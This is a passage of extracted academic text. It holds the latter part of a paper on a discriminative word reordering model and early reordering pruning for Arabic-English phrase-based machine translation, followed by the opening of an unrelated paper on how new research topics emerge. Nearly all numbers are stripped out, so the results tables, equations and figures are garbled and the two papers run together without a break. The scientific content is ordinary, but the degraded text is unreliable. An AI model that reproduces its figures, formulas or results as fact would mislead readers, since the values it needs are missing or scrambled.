the decoding process. we traverse the source positions in the order defined by ", keeping track of the positions that have already been covered and, for each t : " t " j , generate: • one positive sample (r!t,!t+ = ) for the source position that comes right after it, • a negative sample (r!t,u= ) for each source position in {u : "t!#+ < u < "t+#+ # u $= "t+ } that has not yet been translated. here, the sampling window # serves to control the size of the training data and the proportion between positive and negative samples. its value naturally correlates with the dl used in decoding. the gener- ation of training samples is illustrated by table (b). (a) converting word alignments to a permutation: source words are sorted by their target alignments mean a. the unaligned word “d” is assigned the mean of its neighbouring words’ a values ( + )/ = . : (b) generating binary samples by simulating the decoding process: shaded rounds represent cov- ered positions, while dashed arrows represent negative samples: table : the classifier’s training data generation process. . integration into phrase-based decoding rather than using the new reordering model for data pre-processing as done by (visweswariah et al., ), we directly integrate it into the psmt de- coder moses (koehn et al., ). two main computation phases are required by the waw model: (i) at system initialization time, all fea- ture weights are loaded into memory, and (ii) before translating each new sentence, features are extracted from it and model probabilities are pre-computed for each pair of source positions (i, j) such that |j ! i ! | " dl. note that this efficient solution is possible because our model does not employ de- coding history-based features, like the word that was translated before the last one, or like the previous jump legth. this is an important difference with re- spect to the reordered source lm proposed by feng et al. ( ), which requires inclusion of the last n translated words in the decoder state. fig. illustrates the scoring process: when a par- tial translation hypothesis h is expanded by cover- ing a new source phrase f̃ , the model returns the log-probability of translating the words of f̃ in that particular order, just after the last translated word of h. in details, this is done by converting the phrase- internal word alignment to a source permutation, in just the same way it was done to produce the model’s training examples. thus, the global score is inde- pendent from phrase segmentation, and normalized across outputs of different lengths: that is, the proba- bility of any complete hypothesis decomposes into j factors, where j is the length of the input sentence. the waw reordering model is fully compatible with, and complementary to the lexicalized reorder- ing (phrase orientation) models included in moses. figure : integrating the binary word reordering model into a phrase-based decoder: when a new phrase is covered (dashed boxes), the model returns the log- probability of translating its words in the order defined by the phrase-internal word alignment. early pruning of reordering steps we now explain how the waw reordering model can be used to dynamically refine the input permutation space. this method is not dependent on the particu- lar classifier described in this paper, but can in prin- ciple work with any device estimating the probabil- ity of translating a given input word after another. the method consists of querying the reordering model at the time of hypothesis expansion, and fil- tering out hypotheses solely based on their reorder- ing score. the rationale is to avoid costly hypoth- esis expansions for those source positions that the reordering model considers very unlikely to be cov- ered at a given point of decoding. in practice, this works as follows: • at each hypothesis expansion, we first enumer- ate the set of uncovered input positions that are reachable within a fixed dl, and query the waw reordering model for each of them ; phrase-internal alignments are provided in the phrase table. the score used to prune a new word range f̃ is the log prob- ability of translating the first aligned word of f̃ right after the last translated word of the current hypothesis. see also sect. . . • only based on the waw score, we apply his- togram and threshold pruning to this set and proceed to expand the non-pruned positions. furthermore, it is possible to ensure that local re- orderings are always allowed, by setting a so-called non-prunable-zone of width $ around the last cov- ered input position. according to how the dl, pruning parameters, and $ are set, we can actually aim at different tar- gets: with a low dl, loose pruning parameters, and $= we can try to speed up search without sacrific- ing much translation quality. with a high dl, strict pruning parameters, and a medium $, we ensure that the standard medium-range reordering space is ex- plored, as well as those few long jumps that are promising according to the reordering model. in our experiments, we explore this second option with the setting dl= and $= . the underlying idea is similar to that of early pruning proposed by moore and quirk ( ), which consisted in discarding possible extensions of a partial hypothesis based on their estimated score before computing the exact language model score. our technique too has the effect of introducing ad- ditional points at which the search space is pruned. however, while theirs was mainly an optimization technique meant to avoid useless lm queries, we in- stead aim at refining the search space by exploiting the fact that some smt models are more important than others at different stages of the translation pro- cess. our approach actually involves a continuous alternation of two processes: during hypothesis ex- pansion the reordering score is combined with all other scores, while during early pruning some re- ordering decisions are taken only based on the re- ordering score. in this way, we try to combine the benefits of fully integrated reordering models with those of monolingual pre-ordering methods. evaluation we test our approach on an arabic-english news translation task where sentences are typically long and complex. in this language pair, long reorder- ing errors mostly concern verbs, as all of subject- verb-object (svo), vso and, more rarerly, vos see bisazza ( ) for technical details on the integration of word-level pruning with phrase-level hypothesis expansion. constructions are attested in modern written ara- bic. this issue is well known in the smt field and was addressed by several recent works, with deep or shallow parsing-based techniques (green et al., ; carpuat et al., ; andreas et al., ; bisazza et al., ). we question whether our ap- proach – which is not conceived to solve this spe- cific problem, nor requires manual rules to predict verb reordering – will succeed in improving long re- ordering in a fully data-driven way. as smt training data, we use all the in-domain parallel data provided for the nist-mt evalua- tion for a total of k sentence pairs ( m english words). the target lm used to run the main se- ries of experiments is trained on the english side of all available nist-mt parallel data, un included ( m words). in the large-scale experiments, the lm training data also include the sections of the en- glish gigaword that best fit to the development data in terms of perplexity: namely, the agence france- presse, xinhua news agency and associated press worldstream sections ( m words in total). for development and test, we use the newswire sections of the nist benchmarks: dev -nw, eval - nw, eval -nw consisting of , , sen- tences respectively. each set includes reference translations and the average sentence length is words. to focus the evaluation on problematic re- ordering, we also consider a subset of eval -nw containing only sentences where the arabic main verb is placed before the subject (vs- : sent.). as pre-processing, we apply standard tokeniza- tion to the english data, while the arabic data is segmented with amira (diab et al., ) accord- ing to the atb scheme . the same tool also pro- duces pos tagging and shallow syntax annotation. the in-domain parallel data includes all the provided cor- pora except the un proceedings, and the non-newswire parts of the small gale-y -q corpus (that is k sentences of audio transcripts and web data). as reported by green et al. ( ) the removal of un data does not affect baseline performances on the news benchmarks. automatically detected by means of shallow syntax rules. the arabic treebank tokenization scheme isolates con- junctions w+ and f+, prepositions l+, k+, b+, future marker s+, pronominal suffixes, but not the article al+. . reordering model intrinsic evaluation before proceeding to the smt experiments, we evaluate the performance of the waw reorder- ing model in isolation. all the tested configura- tions are trained with the freely available megam toolkit , implementing the conjugate gradient method (hestenes and stiefel, ), in maximum iterations. training samples are generated within a sampling window of width #= , from a subset ( k sentences) of the parallel data described above, resulting in m training word pairs . test samples are generated from tides-mt ( sen- tences, k samples with #= ), one of the corpora included in our smt training data. features with less than occurrences are ignored. classification accuracy. table presents preci- sion, recall, and f-score achieved by different fea- ture subsets, where w stands for word-based, p for pos-based and c for chunk-based feature templates. we can see that all feature types contribute to im- prove the classifier’s performance. the word-based model achieves the highest precision but a very low recall, while the pos-based has much more bal- anced scores. a better performance overall is ob- tained by combining word-, pos- and mixed word- pos-based features ( . % f-score). finally, the addition of chunk-based features yields a further im- provement of about point, reaching . % f-score. given these results, we decide to use the w,p,c model for the rest of the evaluation. features (templates) p r f w [ - ] . . . p [ - ] . . . w,p [ - ] . . . w,p,c [ - ] . . . table : classification accuracy of the waw reordering model on tides-mt , using different feature subsets. the template numbers refer to the rows of table . ranking accuracy. a more important aspect to evaluate for our application is how well our model’s scores can rank a typical set of reordering options. in fact, the waw model is not meant to be used as http://www.cs.utah.edu/˜hal/megam/ (daumé iii, ). this is the maximum number of samples manageable by megam. however, even scaling from m to m was only slightly helpful in our experiments. in the future we plan to test other learning approaches that scale better to large data sets. a stand-alone classifier, but as one of several smt feature functions. moreover, for early reordering pruning to be effective, it is especially important that the correct reordering option be ranked in the top n among those available at the time of a given hypoth- esis expansion. in order to measure this, we simulate the decoding process by traversing the source words in target order and, for each of them, we examine the ranking of all words that may be translated next (i. e. the uncovered positions within a given dl). we check how often the correct jump was ranked first (top- ) or at most third (top- ). we also com- pute the latter score on long reorderings only (top- -long): i. e. backward jumps with distortion d> and forward jumps with d> . in table , results are compared with the ranking produced by standard distortion, which always favors shorter jumps. two conditions are considered: dl= corresponding to the sampling window # used to produce the training data, and dl= that is the maximum distortion of jumps that will be considered in our early-pruning smt experiment. model dl dl-err top- top- top- -long back forw. distortion . . . . . . . . . . waw . . . . . . . . . . table : word-to-word jump ranking accuracy (%) of standard distortion and waw reordering model, in dif- ferent dl conditions. dl-err is the percentage of correct jumps beyond dl. the test set consists of k reordering decisions: one for each source word in tides-mt . we can see that, in terms of overall accuracies, the waw reordering model outperforms standard distor- tion by a large margin (about % absolute). this is an important result, considering that the jump length, strongly correlating with the jump likeli- hood, is not directly known to our model. as re- gards the dl, the higher limit naturally results in a lower dl-error rate (percentage of correct jumps be- yond dl): namely . % instead of . %. however, jump prediction becomes much harder: top- accu- racy of long jumps by distortion drops from . % to . % (backward) and from . % to . % (for- ward). our model is remarkably robust to this effect on backward jumps, where it achieves . % accu- racy. due to the syntactic characteristics of arabic and english, the typical long reordering pattern con- sists in (i) skipping a clause-initial arabic verb, (ii) covering a long subject, then finally (iii) jumping back to translate the verb and (iv) jumping forward to continue translating the rest of the sentence (see fig. for an example). deciding when to jump back to cover the verb (iii) is the hardest part of this process, and that is precisely where our model seems more helpful, while distortion always prefers to proceed monotonically achieving a very low ac- curacy of . %. in the case of long forward jumps (iv), instead, distortion is advantaged as the correct choice typically corresponds to translating the first uncovered position, that is the shortest jump avail- able from the last translated word. even here, our model achieves an accuracy of . %, only slightly lower than that of distortion ( . %). in summary, the waw reordering model signifi- cantly outperforms distortion in the ranking of long jumps. in the large majority of cases, it is able to rank a correct long jump in the top reordering op- tions, which suggests that it can be effectively used for early reordering pruning. . smt experimental setup our smt systems are built with the moses toolkit, while word alignment is produced by the berke- ley aligner (liang et al., ). the baseline de- coder includes a phrase translation model, a lexi- calized reordering model, a -gram target language model, distortion cost, word and phrase penalties. more specifically, the baseline reordering model is a hierarchical phrase orientation model (tillmann, ; koehn et al., ; galley and manning, ) trained on all the available parallel data. this variant was shown to outperform the default word- based on an arabic-english task. to make our base- line even more competitive, we apply early distor- tion cost, as proposed by moore and quirk ( ). this function has the same value as the standard one over a complete translation hypothesis, but it antic- ipates the gradual accumulation of the cost, mak- ing hypotheses of the same length more compara- ble to one another. note that this option has no ef- clearly, we would expect different figures from testing the model on another language pair like german-english, where the verb is often postponed in the source with respect to the target. fect on the distortion limit, but only on the distor- tion cost feature function. as proposed by johnson et al. ( ), statistically improbable phrase pairs are removed from the translation model. the lan- guage models are estimated by the irstlm toolkit (federico et al., ) with modified kneser-ney smoothing (chen and goodman, ). feature weights are optimized by minimum bleu-error training (och, ) on dev -nw. to reduce the effects of the optimizer instability, we tune each configuration four times and use the av- erage of the resulting weight vectors to translate the test sets, as suggested by cettolo et al. ( ). finally, eval -nw is used to select the early prun- ing parameters for the last experiment, while eval - nw is always reserved as blind test. . evaluation metrics we evaluate global translation quality with bleu (papineni et al., ) and meteor (banerjee and lavie, ). these metrics, though, are only in- directly sensitive to word order, and especially un- likely to capture improvements at the level of long- range reordering. for this reason, we also com- pute the kendall reordering score or krs (birch et al., ) which is a positive score based on the kendall’s tau distance between the source-output permutation % and the source-reference permuta- tions ": krs(%, ") = ( ! # k(%, ")) · bp k(%, ") = "n i= "n j= d(i, j) n(n ! ) d(i, j) = $ if %i < %j and "i > "j otherwise where bp is a sentence-level brevity penalty, similar to that of bleu. the krs is robust to lexical choice because it performs no comparison between output and reference words, but only between the positions of their translations. besides, it was shown to corre- late strongly with human judgements of fluency. our work specifically addresses long-range re- ordering phenomena in language pairs where these are quite rare, although crucial for preserving the source text meaning. hence, an improvement at this level may not be detected by the general-purpose metrics. we then develop a krs variant that is only sensitive to the positioning of specific input words. assuming that each input word fi is assigned a weight !i, the formula above is modified as follows: d"(i, j) = $ !i+!j if %i < %j and "i > "j otherwise a similar element-weighted version of kendall tau was proposed by kumar and vassilvitskii ( ) to evaluate document rankings in information retrieval. because long reordering errors in arabic-english mostly affect verbs, we set the weights to for verbs and for all other words to only capture verb re- ordering errors, and call the resulting metric krs-v. the source-reference word alignments needed to compute the reordering scores are generated by the berkeley aligner previously trained on the training data. source-output word alignments are instead ob- tained from the decoder’s trace. . results and discussion to motivate the choice of our baseline setup (early distortion cost and dl= ), we first compare the per- formance of standard and early distortion costs un- der various dl conditions. !"#$% !"#&'()% !"#($% !"#&% !"#$% !"#()% !"#($% !"#"$ !%#"$ !!#"$ !&#"$ !'#"$ &(#"$ &)#"$ &*#"$ &+#"$ ,+#)$ ,+#%$ ,,#)$ ,,#%$ ,"#)$ * + , % -"./% -./ $ . ./ $ figure : standard vs early distortion cost results on eval -nw under different distortion limits (dl), using the medium-size lm. best scores are on top-right corner. as shown in fig. , most results are close to each other in terms of bleu and krs, but early distor- tion consistently outperforms the standard one (sta- tistically significant). the most striking difference appears at a very high distortion limit ( ), where standard distortion scores drop by more than bleu point and almost krs points! early distortion is much more robust (only - krs when going from dl= to dl= ), which makes our baseline system especially strong at the level of reordering. table presents the results obtained by integrat- ing the waw reordering model as an additional feature function, and by applying early reordering pruning. the upper part of the table refers to the medium-scale evaluation, while the lower part refers to the large-scale evaluation. in each part, statis- tical significance is computed against the baseline [b] by approximate randomization as in (riezler and maxwell, ). run times are obtained by an intel xeon x processor on the first sentences of eval -nw, and exclude loading time of all models. medium-scale evaluation. integrating the waw model as an additional feature function results in small but consistent improvements in all dl condi- tions, which shows that this type of model conveys information that is missing from the state-of-the-art reordering models. as regards efficiency, the new model makes decoding time increase by %. among the dl settings considered, dl= is con- firmed as the optimal one – with or without waw model. raising the dl to with no special prun- ing has a negative impact on both translation quality and efficiency. the effect is especially visible on the reordering scores: that is, from . to . krs and from . to . krs-v on eval -nw. run times are almost doubled: from to and from to ms/word, that is a % increase. we then proceed to the last experiment where the reordering space is dynamically pruned based on the waw model score. as explained in sect. , a non-prunable-zone of width $= is set around the last covered position. to set the early pruning pa- rameters, we perform a grid search over the values ( , , , , ) for histogram and ( . , . , . ) for relative threshold, and select the values that achieve the best bleu and krs on eval -nw, namely (his- togram) and . (threshold). the resulting configu- ration is then re-optimized by mert on dev -nw. this setting implies that, at a given point of decod- ing where i is the last covered position, a new word can be translated only if: • it lies within a dl of from i, or • it lies within a dl of from i and its waw reordering score is among the top and at least equal to / of the best score (in linear space). as shown in table , early pruning achieves the best results overall: despite the high dl, we report dl reo.models eval -nw eval -nw vs- ms/ bleu met krs krs-v bleu met krs krs-v krs-v word using the medium-size lm ( m english tokens): hier.lexreo, early disto . . ! . ! . ! . " . . . . + waw model . . . . . # . # . # . $ . # hier.lexreo, early disto[b] . . . . . . . . . + waw model . . . $ . . # . # . # . # . # hier.lexreo, early disto . . ! . ! . ! . . " . ! . " . " + waw model . . . ! . . $ . # . " . . + early reo.pruning($= ) . . . $ . # . . # . . # . # using the large interpolated lm ( m english tokens) and double beam-size: hier.lexreo, early disto[b] . . . . . . . . . hier.lexreo, early disto . " . ! . ! . ! . . ! . ! . ! . ! +waw+reo.pruning($= ) . . . . # . # . # . . # . # table : effects of waw reordering modeling and early reordering pruning on translation quality, measured with % bleu, meteor, and kendall reordering score: regular (krs) and verb-specific (krs-v). statistically significant differences with respect to the baseline [b] are marked with #! at the p " . level and $" at the p " . level. decoding time is measured in milliseconds per input word. no loss in bleu, meteor and krs, but we actually see several improvements. in particular, the gains on the blind test eval -nw are + . bleu, + . me- teor and + . krs (only meteor is significant). while these gains are admittedly small, we recall that our techniques affect rare and isolated events which can hardly emerge from the general-purpose evaluation metrics. moreover, to our knowledge, this is the first time that a psmt system is shown to maintain a good performance on this language pair while admitting very long-range reorderings. finally and more importantly, the reordering of verbs improves significantly on both generic tests and on the vs- sentence subset (vs- ): namely, in the latter, we achieve a notable gain of . krs-v. efficiency is also largely improved by our early reordering pruning technique: decoding time is re- duced to ms/word, corresponding to a % speed-up over the baseline. large-scale evaluation. we also investigate whether our methods can be useful in a scenario where efficiency is less important and more data is available for training. to this end, we build a very large lm by interpolating the main lm with three other lms trained on different gigaword sec- tions (see sect. ). moreover, we relax the decoder’s beam size from the default value of to hy- potheses, to reduce the risk of search errors and ob- tain the best possible baseline performance. by comparing the large-scale with the medium- scale baseline in table , we note that the addition of lm data is especially beneficial for bleu (+ . on eval -nw and + . on eval -nw), but not as much for the other metrics, which challenges the commonly held idea that more data always improves translation quality. here too, relaxing the dl without special pruning hurts not only efficiency but also translation qual- ity: all the scores decrease considerably, showing that even the stronger lm is not sufficient to guide search through a very large reordering search space. as for our enhanced system, it achieves simi- lar gains as in the medium-scale scenario: that is, bleu and meteor are preserved or slightly im- proved despite the very high dl, while all the re- ordering scores increase. in particular, we report sta- tistically significant improvements in the reordering of verbs, which is where the impact of our method is expected to concentrate (+ . , + . and + . krs-v on eval -nw, eval -nw and vs- , respectively). these results confirm the usefulness of our method not only as an optimization technique, but also as a way to improve translation quality on top of a very strong baseline. src ! ! ! "#$!% &'( )* +, -. / $%&' &- ! + + * + ( ! + #+ ! : &- *; < ( &- ! ( &-=>?@a( b* +cd ef( * verb subj. obj. compl. ywasl sfyr almmlkp alerbyp alsewdyp ldy lbnan ebdalezyz xwjp thrk -h fy atjah ... continues ambassador kingdom arabian saudi to lebanon abdulaziz khawja move his in direction ref the kingdom of saudi arabia ’s ambassador to lebanon abdulaziz khawja continues his moves towards ... base continue to saudi arabian ambassador to lebanon , abdulaziz khwja its move in the direction of ... new the kingdom of saudi arabia ’s ambassador to lebanon , abdulaziz khwja continue its move in the direction of ... src ;# *$g'( h( + &b ( )i( e j<k # +l m#nl &-o p )*qr# *< ( s! & =@a( tu*v w xy. # ; #? * +, adv. verb obj. subj. compl. fyma dea -hm r}ys almktb alsyasy l- hrkp hmas xald m$el aly altzam alhyad meanwhile called them head bureau political of movement hamas khaled mashal to necessity neutrality ref meanwhile, the head of the political bureau of the hamas movement, khaled mashal, called upon them to remain neutral base the called them, head of hamas’ political bureau, khalid mashal, to remain neutral new the head of hamas’ political bureau, khalid mashal, called on them to remain neutral figure : long reordering examples showing improvements over the baseline system (base) when the dl is raised to and early pruning based on waw reordering scores is enabled (new). long jumps statistics and examples. to better understand the behavior of the early-pruning system, we extract phrase-to-phrase jump statistics from the decoder log file. we find that jumps beyond the non-prunable zone (d> ) were performed to trans- late the sentences of eval -nw; out of these were longer than and mostly concentrated on the vs- sentence subset ( jumps d> performed in vs- ). this and the higher reordering scores sug- gest that long jumps are mainly carried out to cor- rectly reorder clause-inital verbs over long subjects. fig. shows two arabic sentences taken from eval -nw, that were erroneuously reordered by the baseline system. the system including the waw model and early reordering pruning, instead, pro- duced the correct translation. the first sentence is a typical example of vso order with a long subject: while the baseline system left the verb in its ara- bic position, producing an incomprehensible trans- lation, the new system placed it rightly between the english subject and object. this reordering involved two long jumps: one with d= backward and one with d= forward. the second sentence displays another, less com- mon, arabic construction: namely vos, with a per- sonal pronoun object. in this case, a backward jump with d= and a forward jump with d= were nec- essary to achieve the correct reordering. statistics computed on the medium-lm system. conclusions we have trained a discriminative model to predict likely reordering steps in a way that is complemen- tary to state-of-the-art psmt reordering models. we have effectively integrated it into a psmt decoder as additional feature, ensuring that its total score over a complete translation hypothesis is consistent across different phrase segmentations. lastly, we have pro- posed early reordering pruning as a novel method to dynamically shape the input reordering space and capture long-range reordering phenomena that are often critical when translating between languages with different syntactic structures. evaluated on a popular arabic-english news translation task against a strong baseline, our ap- proach leads to similar or even higher bleu, me- teor and krs scores at a very high distortion limit ( ), which is by itself an important achievement. at the same time, the reordering of verbs, measured with a novel version of the krs, is consistently im- proved, while decoding gets significantly faster. the improvements are also confirmed when a very large lm is used and the decoder’s beam size is dou- bled, which shows that our method reduces not only search errors but also model errors even when base- line models are very strong. word reordering is probably the most difficult as- pect of smt and an important factor of both its qual- ity and efficiency. given its strong interaction with the other aspects of smt, it appears natural to solve word reordering during decoding, rather than before or after it. to date, however, this objective was only partially achieved. we believe there is a promising way to go between fully-integrated reordering mod- els and monolingual pre-ordering methods. this work has started to explore it. aknowledgments this work was partially funded by the european union fp grant agreement (eu-bridge). references yaser al-onaizan and kishore papineni. . distor- tion models for statistical machine translation. in pro- ceedings of the st international conference on com- putational linguistics and th annual meeting of the association for computational linguistics, pages – , sydney, australia, july. jacob andreas, nizar habash, and owen rambow. . fuzzy syntactic reordering for phrase-based statistical machine translation. in proceedings of the sixth work- shop on statistical machine translation, pages – , edinburgh, scotland, july. satanjeev banerjee and alon lavie. . meteor: an automatic metric for mt evaluation with improved correlation with human judgments. in proceedings of the acl workshop on intrinsic and extrinsic evalu- ation measures for machine translation and/or sum- marization, pages – , ann arbor, michigan, june. a. l. berger, p. f. brown, s. a. della pietra, v. j. della pietra, j. r. gillett, a. s. kehler, and r. l. mercer. . language translation apparatus and method of using context-based translation models. united states patent, no. , apr. alexandra birch, phil blunsom, and miles osborne. . a quantitative analysis of reordering phenom- ena. in statmt ’ : proceedings of the fourth work- shop on statistical machine translation, pages – , morristown, nj, usa. alexandra birch, miles osborne, and phil blunsom. . metrics for mt evaluation: evaluating reorder- ing. machine translation, ( ): – . arianna bisazza and marcello federico. . modi- fied distortion matrices for phrase-based statistical ma- chine translation. in proceedings of the th annual meeting of the association for computational linguis- tics (volume : long papers), pages – , jeju is- land, korea, july. arianna bisazza, daniele pighin, and marcello fed- erico. . chunk-lattices for verb reordering in arabic-english statistical machine translation. ma- chine translation, special issue on mt for arabic, ( - ): – . arianna bisazza. . linguistically motivated re- ordering modeling for phrase-based statistical ma- chine translation. ph.d. thesis, university of trento. http://eprints-phd.biblio.unitn.it/ /. marine carpuat, yuval marton, and nizar habash. . improved arabic-to-english statistical machine trans- lation by reordering post-verbal subjects for word alignment. machine translation, special issue on mt for arabic, ( - ): – . mauro cettolo, nicola bertoldi, and marcello federico. . methods for smoothing the optimizer instability in smt. in mt summit xiii: the thirteenth machine translation summit, pages – , xiamen, china. stanley f. chen and joshua goodman. . an empiri- cal study of smoothing techniques for language model- ing. computer speech and language, ( ): – . marta r. costa-jussà and josé a. r. fonollosa. . state-of-the-art word reordering approaches in statisti- cal machine translation: a survey. ieice transac- tions on information and systems, e -d( ): – . koby crammer and yoram singer. . ultraconser- vative online algorithms for multiclass problems. j. mach. learn. res., : – , march. hal daumé iii. . notes on cg and lm-bfgs op- timization of logistic regression. paper available at http://pub.hal .name, implementation avail- able at http://hal .name/megam. mona diab, kadri hacioglu, and daniel jurafsky. . automatic tagging of arabic text: from raw text to base phrase chunks. in daniel marcu susan dumais and salim roukos, editors, hlt-naacl : short papers, pages – , boston, massachusetts, usa. marcello federico, nicola bertoldi, and mauro cettolo. . irstlm: an open source toolkit for handling large scale language models. in proceedings of in- terspeech, pages – , melbourne, australia. minwei feng, arne mauser, and hermann ney. . a source-side decoding sequence model for statisti- cal machine translation. in conference of the associa- tion for machine translation in the americas (amta), denver, colorado, usa. michel galley and christopher d. manning. . a simple and effective hierarchical phrase reordering model. in emnlp ’ : proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , morristown, nj, usa. spence green, conal sathi, and christopher d. man- ning. . np subject detection in verb-initial ara- bic clauses. in proceedings of the third workshop on computational approaches to arabic script-based languages (caasl ), ottawa, canada. spence green, michel galley, and christopher d. man- ning. . improved models of distortion cost for statistical machine translation. in human language technologies: the annual conference of the north american chapter of the association for com- putational linguistics (naacl), pages – , los angeles, california. magnus r. hestenes and eduard stiefel. . meth- ods of conjugate gradients for solving linear systems. journal of research of the national bureau of stan- dards, ( ): – . h. johnson, j. martin, g. foster, and r. kuhn. . im- proving translation quality by discarding most of the phrasetable. in in proceedings of emnlp-conll , pages – . philipp koehn, franz josef och, and daniel marcu. . statistical phrase-based translation. in proceed- ings of hlt-naacl , pages – , edmonton, canada. philipp koehn, amittai axelrod, alexandra birch mayne, chris callison-burch, miles osborne, and david talbot. . edinburgh system description for the iwslt speech translation evaluation. in proc. of the international workshop on spoken lan- guage translation, october. p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran, r. zens, c. dyer, o. bojar, a. constantin, and e. herbst. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meeting of the association for com- putational linguistics companion volume proceed- ings of the demo and poster sessions, pages – , prague, czech republic. ravi kumar and sergei vassilvitskii. . general- ized distances between rankings. in proceedings of the th international conference on world wide web, pages – , new york, ny, usa. acm. percy liang, ben taskar, and dan klein. . align- ment by agreement. in proceedings of the human language technology conference of the naacl, main conference, pages – , new york city, usa, june. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajič. . non-projective dependency parsing using spanning tree algorithms. in proceedings of the conference on human language technology and em- pirical methods in natural language processing, hlt ’ , pages – , stroudsburg, pa, usa. robert c. moore and chris quirk. . faster beam- search decoding for phrasal statistical machine transla- tion. in in proceedings of mt summit xi, pages – , copenhagen, denmark. f. och and h. ney. . discriminative training and maximum entropy models for statistical machine translation. in proceedings of the th annual meet- ing of the association for computational linguistics (acl), pages – , philadelhpia, pa. franz josef och. . minimum error rate training in statistical machine translation. in erhard hinrichs and dan roth, editors, proceedings of the st annual meeting of the association for computational linguis- tics, pages – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in proceedings of the th annual meeting of the association of compu- tational linguistics (acl), pages – , philadel- phia, pa. stefan riezler and john t. maxwell. . on some pitfalls in automatic evaluation and significance test- ing for mt. in proceedings of the acl workshop on intrinsic and extrinsic evaluation measures for ma- chine translation and/or summarization, pages – , ann arbor, michigan, june. christoph tillmann. . a unigram orientation model for statistical machine translation. in pro- ceedings of the joint conference on human language technologies and the annual meeting of the north american chapter of the association of computa- tional linguistics (hlt-naacl). karthik visweswariah, rajakrishnan rajkumar, ankur gandhe, ananthakrishnan ramanathan, and jiri navratil. . a word reordering model for im- proved machine translation. in proceedings of the conference on empirical methods in natu- ral language processing, pages – , edinburgh, scotland, uk., july. dekai wu. . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, ( ): – . sirvan yahyaei and christof monz. . dynamic dis- tortion in a discriminative reordering model for sta- tistical machine translation. in international work- shop on spoken language translation (iwslt), paris, france. richard zens and hermann ney. . discriminative reordering models for statistical machine translation. in proceedings on the workshop on statistical ma- chine translation, pages – , new york city, june. r. zens, f. j. och, and h. ney. . phrase-based sta- tistical machine translation. in th german confer- ence on artificial intelligence (ki ), pages – , aachen, germany. springer verlag. submitted july accepted may published june corresponding author angelo a. salatino, angelo.salatino@open.ac.uk academic editor filippo menczer additional information and declarations can be found on page doi . /peerj-cs. copyright salatino et al. distributed under creative commons cc-by . open access how are topics born? understanding the research dynamics preceding the emergence of new areas angelo a. salatino, francesco osborne and enrico motta knowledge media institute, the open university, milton keynes, united kingdom abstract the ability to promptly recognise new research trends is strategic for many stake- holders, including universities, institutional funding bodies, academic publishers and companies. while the literature describes several approaches which aim to identify the emergence of new research topics early in their lifecycle, these rely on the assumption that the topic in question is already associated with a number of publications and consistently referred to by a community of researchers. hence, detecting the emergence of a new research area at an embryonic stage, i.e., before the topic has been consistently labelled by a community of researchers and associated with a number of publications, is still an open challenge. in this paper, we begin to address this challenge by performing a study of the dynamics preceding the creation of new topics. this study indicates that the emergence of a new topic is anticipated by a significant increase in the pace of collaboration between relevant research areas, which can be seen as the ‘parents’ of the new topic. these initial findings (i) confirm our hypothesis that it is possible in principle to detect the emergence of a new topic at the embryonic stage, (ii) provide new empirical evidence supporting relevant theories in philosophy of science, and also (iii) suggest that new topics tend to emerge in an environment in which weakly interconnected research areas begin to cross-fertilise. subjects artificial intelligence, data science, digital libraries keywords scholarly data, topic emergence detection, empirical study, research trend detection, topic discovery, digital libraries introduction early awareness of the emergence of new research topics can bring significant benefits to anybody involved in the research environment. academic publishers and editors can exploit this knowledge and offer the most up to date and interesting contents. researchers may not only be interested in new trends related to their areas but may also find it very useful to be alerted about significant new research developments in general. institutional funding bodies and companies also need to be regularly updated on how the research landscape is evolving, so that they can make early decisions about critical investments. considering the growth rate of research publications (larsen & von ins, ), keeping up with novel trends is a challenge even for expert researchers. traditional methods, such as the manual exploration of publications in significant conferences and journals, are no longer viable. this has led to the emergence of several approaches capable of detecting novel topics and how to cite this article salatino et al. ( ), how are topics born? understanding the research dynamics preceding the emergence of new areas. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:angelo.salatino@open.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. research trends (bolelli, ertekin & giles, ; duvvuru, kamarthi & sultornsanee, ; he et al., ; wu, venkatramanan & chiu, ). however, all of these approaches focus on topics that are already associated with a number of publications and consistently referred to by a community of researchers. this limitation hinders the ability of stakeholders to anticipate and react promptly to new developments in the research landscape. hence, there is a need for novel methods capable of identifying the appearance of new topics at a very early stage, assessing their potential and forecasting their trajectory. to this end, we need first to achieve a better understanding of the dynamics underlying the creation of new topics and then investigate whether such understanding can be exploited to develop computationally effective methods, which are capable of detecting the emergence of new topics at a very early stage. the field of philosophy of science offers a number of interesting theories about the emergence of new topics kuhn ( ) theorised that science evolves through paradigm shifts. according to him, scientific work is performed within a set of paradigms and when these paradigms cannot cope with certain problems, there is a paradigm shift that can lead to the emergence of a new scientific discipline. this happens often through the creation of novel scientific collaborations. in this context, becher & trowler ( ) explained that, even if science proceeds towards more specific disciplines, and thus researchers in different communities become less compatible, they are still inclined to collaborate for mutual benefit. herrera, roberts & gulbahce ( ), sun et al. ( ) and nowotny, scott & gibbons ( ) suggested that the development of new topics is encouraged by the cross- fertilisation of established research areas and recognised that multidisciplinary approaches foster new developments and innovative thinking. sun et al. ( ) and osborne, scavo & motta ( ) provided empirical evidence to these theories by analysing the social dynamics of researchers and their effects on the formation and life-cycle of research communities and topics. according to these theories, when a new scientific area emerges, it goes through two main phases. in the initial phase a group of scientists agree on some basic tenets, build a conceptual framework and begin to establish a new scientific community. afterwards, the area enters a recognised phase, in which a substantial number of authors become active in the area, producing and disseminating results (couvalis, ). inspired by these theories, we hypothesize the existence of an even earlier phase, which we name embryonic phase, in which a topic has not yet been explicitly labelled and recognized by a research community, but it is already taking shape, as evidenced by the fact that researchers from a variety of fields are forming new collaborations and producing new work, starting to define the challenges and the paradigms associated with the emerging new area. we also hypothesize that it could be possible to detect topics at this stage by analysing the dynamics of already established topics. in this context, we use the term dynamics to refer to the significant trends associated with a topic, including the interactions between topics and those between entities linked to these topics, such as publications, authors, venues. for example, the sudden appearance of some publications concerning a combination of previously uncorrelated topics may suggest that some pioneer researchers are investigating salatino et al. ( ), 